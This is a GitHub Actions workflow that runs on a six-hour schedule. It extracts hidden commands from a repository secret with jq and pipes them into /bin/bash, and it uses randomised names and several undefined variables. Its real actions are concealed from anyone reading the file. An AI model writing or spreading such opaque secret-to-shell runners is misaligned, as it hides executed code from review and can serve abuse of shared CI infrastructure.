name: chenjinzhisuo

on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenjinzhisuo
        env:
          ely33: ${{ secrets.ely33 }}
        run: |
          echo $ely33 | jq -r .sn4168 | /bin/bash
          echo $xjag97 | jq -r .a13 | /bin/bash
          echo $ucf85449 | jq -r .v079 | /bin/bash
          echo $ttrq93 | jq -r .sviir76032 | /bin/bash
          echo $hxtvs72478 | jq -r .zy2 | /bin/bash

